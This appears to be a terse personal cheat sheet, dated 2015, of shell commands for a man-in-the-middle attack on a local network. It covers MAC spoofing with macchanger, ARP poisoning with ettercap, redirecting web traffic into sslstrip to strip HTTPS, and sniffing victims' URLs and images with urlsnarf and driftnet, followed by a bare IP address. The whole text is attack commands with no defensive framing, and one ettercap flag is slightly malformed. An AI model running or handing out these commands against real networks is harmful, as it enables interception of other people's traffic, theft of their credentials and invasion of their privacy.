21.04.2015

man-in-the-middle MITM

#ifconfig eth0 down
#macchanger --mac XX:XX:XX... eth0
#ifconfig eth0 up
#echo 1 > /proc/sys/net/ipv4/ip_forward
#nano /etc/etter.conf
(del comment in iptables)
#ettercap -Tql -eth0 -M arp:remote // //
#iptables -t nat -A PREROUTING -i eth0 -p tcp --destination-port 80 -j REDIRECT --to-port 10000
#sslstrip -a -k -f

urlsnarf -i wlan0

driftnet -i wlan0 -d /root/xxx





192.168.5.104